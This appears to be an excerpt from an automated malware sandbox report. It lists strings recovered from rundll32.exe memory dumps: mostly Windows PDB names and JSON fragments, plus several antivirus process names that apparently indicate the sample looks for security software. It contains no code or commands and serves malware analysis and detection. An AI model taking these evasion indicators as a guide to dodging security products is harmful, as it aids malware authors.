    Source: Binary string: tdll.pdb"},{"type":"x source: rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862052201.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: combase.pdbto ServerR source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: psapi.pdbexe[ source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: shcore.pdbedrSizenfo0cf source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: user32.pdbSecurityTools source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: msctf.pdb/SecurityToolsy source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: gdi32full.pdbute source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: iphlpapi.pdbrityupport$ source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ISATRAY.exews2_32.pdb"}, source: rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163820855.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164109190.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp
    Source: Binary string: kernelbase.pdbrrorCodeO source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: UxTheme.pdbSecurityodee source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: dnsapi.pdbedlogy source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: tdll.pdb"},{"type":"i source: rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714437251.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: 67b6bcd000","debug_file":"oleaut32.pdb"},{"type":"symbolic","name":"C:\\Windows\\System32\\msvcp_win.dll","arch" source: rundll32.exe, 0000000D.00000003.2562895894.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237961840.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2488136352.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521748816.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461958386.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239400696.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639278156.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: Nvcoas.exemagehlp.pdb"},jM source: rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163820855.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164109190.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp
    Source: Binary string: fwpuclnt.pdbcurityToolsj source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: tdll.pdb"},{"type":"p source: rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787058914.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: bug_file":"combase.pdb"},{"type":"symbolic",] source: rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237961840.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935513236.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461958386.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714437251.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862052201.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521748816.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787058914.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639067578.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562830811.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ore.pdb" source: rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: oleaut32.pdbeExtensions source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: _id":"28e89a43c000","debug_file":"cryptbase.pdb"},{"type4 source: rundll32.exe, 0000000D.00000003.2562895894.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2488136352.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639278156.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: combase.pdbto ServerRsx source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: userenv.pdbEksizeh source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: 000" bug_file":"combase.pdb"},{"type":"symbolic",] source: rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237961840.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935513236.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461958386.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714437251.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862052201.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521748816.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787058914.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639067578.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562830811.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: advapi32.pdbtione source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: iphlpapi.pdbrityupport source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: profapi.pdbeionionport source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: bcrypt.pdbexee 6er# source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: secur32.pdbecurityTools source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: msvcrt.pdbEedonvice.exe source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: _id":"28e89a43c000","debug_file":"cryptbase.pdb"},{"type source: rundll32.exe, 0000000D.00000003.2562895894.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2488136352.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639278156.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: sechost.pdbEe source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ws2_32.pdbnmentSupported source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: kernelbase.pdbrrorCodeO| source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: NPAVTRAY.execomn.pdb"},{ source: rundll32.exe, 0000000D.00000003.3164057570.0000025BF00EC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163820855.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp
    Source: Binary string: wbemsvc.pdbecurityTools source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: imagehlp.pdbcurityTools source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: rundll32.pdbEe* source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: 9cd10f033ef5-1","code_id":"ce95420b156000","debug_file":"crypt32.pdb"},{"type":"symbolic","name":"C:\\Windows\\System32\\bcrypt.dll","arch":null,"image_addr":"0x7ffdb23N4 source: rundll32.exe, 0000000D.00000003.2562895894.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237961840.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2488136352.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521748816.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461958386.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239400696.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639278156.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ntdll.pdbitysNameSDOmw== source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: rundll32.pdbEe* FRR source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: PAVPROXY.exeore.pdb"},{"\M source: rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163820855.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164109190.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp
    Source: Binary string: sspicli.pdbecurityTools source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: tdll.pdb"},{"type":" source: rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237961840.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935513236.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461958386.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714437251.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862052201.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521748816.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787058914.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639067578.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562830811.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: drweb.exeore.pdb" source: rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp
